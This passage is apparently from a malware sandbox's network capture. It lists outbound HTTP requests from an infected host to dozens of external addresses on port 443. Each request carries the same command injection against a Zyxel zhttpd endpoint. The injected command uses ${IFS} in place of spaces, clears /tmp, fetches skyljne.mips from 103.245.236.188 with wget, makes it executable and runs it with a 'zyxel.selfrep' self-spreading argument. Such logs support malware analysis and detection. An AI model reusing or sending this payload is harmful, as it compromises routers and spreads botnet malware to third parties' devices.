                                                Jan 12, 2024 18:24:49.180484056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7939192.168.2.1336842171.156.154.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180540085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7940192.168.2.1340128103.243.35.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180581093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7941192.168.2.1336664208.219.130.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.184153080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7942192.168.2.1337296167.85.15.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.184197903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7943192.168.2.1350096152.251.175.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.184206963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7944192.168.2.133903631.248.84.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.184247017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7945192.168.2.1354820105.178.47.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.184287071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7946192.168.2.1341304120.235.243.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196562052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7947192.168.2.1346356216.150.102.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196568012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7948192.168.2.1352214122.3.21.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196594000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7949192.168.2.1348908104.244.74.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196686983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7950192.168.2.1356652223.36.142.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196770906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7951192.168.2.135926265.118.120.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196789026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7952192.168.2.1334918169.98.26.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196865082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7953192.168.2.134907280.5.151.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196916103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7954192.168.2.135331019.57.68.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.196973085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7955192.168.2.1334628193.130.197.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197089911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7956192.168.2.1342502115.245.133.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197129011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7957192.168.2.1334744159.89.236.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197169065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7958192.168.2.135744075.8.141.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197252035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7959192.168.2.134185870.32.35.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197304964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7960192.168.2.1358846192.208.88.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197381020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7961192.168.2.1355452217.209.241.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197381020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7962192.168.2.133595687.24.235.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197431087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7963192.168.2.1353990101.217.107.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197498083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7964192.168.2.1348704193.252.136.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197559118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7965192.168.2.1356390135.77.115.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197587013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7966192.168.2.1360682217.210.56.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197669983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7967192.168.2.1349126194.234.24.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197705984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7968192.168.2.134709261.125.41.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197825909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7969192.168.2.1335534208.162.243.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197866917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7970192.168.2.1356688135.23.126.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197915077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7971192.168.2.1343968130.165.113.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197938919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7972192.168.2.1357050178.109.26.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.197984934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7973192.168.2.1338120177.192.66.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198046923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7974192.168.2.1341564123.31.50.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198077917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7975192.168.2.1354790113.209.167.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198128939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7976192.168.2.134303477.67.73.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198288918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7977192.168.2.134681447.134.4.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198364973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7978192.168.2.135434250.67.164.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198384047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7979192.168.2.1338280178.17.101.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198430061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7980192.168.2.1350170130.143.110.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198472023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7981192.168.2.1347984180.57.92.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198587894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7982192.168.2.1338746204.241.198.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198642969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7983192.168.2.1345656130.213.148.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7984192.168.2.1334710101.139.196.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7985192.168.2.1340588223.103.235.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7986192.168.2.1333018155.96.223.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198697090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7987192.168.2.1339168101.172.214.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198769093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7988192.168.2.1335344174.147.95.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198832989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7989192.168.2.1348618161.163.161.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198894978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7990192.168.2.133649293.86.92.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.198964119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7991192.168.2.1339674115.110.176.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199028015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7992192.168.2.1360688152.44.128.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199112892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7993192.168.2.134412284.214.49.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199112892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7994192.168.2.1356888108.12.65.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199141979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7995192.168.2.1344438202.14.196.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199201107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7996192.168.2.1335358221.108.91.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199248075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7997192.168.2.133474031.209.206.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199369907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7998192.168.2.1359886166.225.82.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199430943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7999192.168.2.1344086144.208.241.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199532032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8000192.168.2.133697471.250.181.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.199573994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8001192.168.2.134573639.120.129.103443
                                                TimestampBytes transferredDirectionData
